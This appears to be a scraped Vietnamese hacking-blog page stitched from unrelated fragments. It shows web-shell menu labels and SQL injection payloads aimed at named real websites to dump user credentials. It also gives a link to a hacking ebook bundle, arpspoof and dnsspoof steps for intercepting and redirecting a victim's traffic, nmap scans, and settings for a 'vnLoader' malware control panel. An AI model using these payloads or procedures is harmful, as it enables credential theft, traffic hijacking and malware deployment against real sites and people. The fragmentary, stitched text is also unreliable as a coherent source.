Connect to shell
Connected
XSA Tool
Getting Username
Going to that directory
Dir Listing
Just For Fun (/etc/passwd)
Download
Connected
XSA Tool
Getting Username
Going to that directory
Dir Listing
Just For Fun (/etc/passwd)
Download
http://www.elansystems.co.za/product-item.php?product_items_id=-11
UNION SELECT
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username,
0x3b,password),5,6,7,8,9,10 from users_tbl--
http://www.nbjm-sprayer.com/products.php?id=-1
UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1
9,20,21,22,23 from user_table--
http://www.mcdonaldlawoffice.net/story.php?articleid=-8
UNION SELECT
1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16
from users--
http://localtime.biz/product.php?cat_id=-1
UNION SELECT
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b,
pwd,0x3c,0x62,0x72,0x3e),4 from users--
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--
http://www.media4world.de/mini_d/list_art.php?shop=-5
UNION SELECT
group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from
user--
EBOOKS INCLUDED
Exploit Folder
Programming Folder
C / C++
Linux
Perl
Hacking Folder
Web
Networking Folder
Programming
Security
Unix Folder
BSD
Kernel
Linux
Shell
SQL Folder
DOWNLOAD
http://www.multiupload.com/0UTEX76FE9 Nguồn: hackforums.net |
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <victim ip> <router ip>
arpspoof -i <interface> -t <router ip> <victim ip>
arpspoof -i <interface> <router ip>
Trường hợp 2 mọi người nhớ cẩn thận nếu như nhiều người trong mạng quá có thể gây DOS.
Redirect :
Sau khi hoàn thành bước MITM ta tiếp tục đến phần phá phách :
Mình sẽ sử dụng phương pháp DNS Spoofing để redirect victim qua những web site do ta định sẵn :
Đầu tiên ta tạo 1 file txt, trong đó ta gõ theo cú pháp :
<ip> <website>
với <ip> là IP của website mà ta muốn redirect victim đến,
<website> là những website mà khi victim truy cập sẽ bị redirect
sang web của ta.
Ví dụ:
127.0.0.1 www.google.com ( redirect vào localhost )
-hoặc-
74.125.224.46 www.facebook.com ( khi victim vào facebook.com sẽ bị chuyển qua google.com)
ta có thể sử dụng dấu * như 1 cách "bao gồm toàn bộ", chẳng hạn:
74.125.224.46 www.*.com (toàn bộ trang web bắt đầu bằng www và kết thúc bằng .com sẽ bị chuyển hướng)
Sau khi ta tạo file text, ta mở Terminal khác và gõ :
Code:
[code]dnsspoof -i <interface> -f <đường dẫn đến file txt mới tạo>
nmap -T4 -O <ip>/24
nmap -T4 -O 192.168.0.0/24
@mysql_connect("dbserver", "dbusername", "dbpassword");
@mysql_select_db("dbname");
'FOR EXAMPLE OUR WEBPANEL IS HERE: http://someserver.com/vnloader/
Server = "someserver.com" 'Your Domain (without: "http://" or "www.")
Prefix = "/vnLoader/" 'Path to the folder of the webpanel
Password = "updateandremovepassword" 'Password for the update command
Mutex = "Something Random Here" 'Mutex
StartUp = "Startupkey" 'Startupkey
Copyright © Dương-UG Blog's - Nguyễn Bình Dương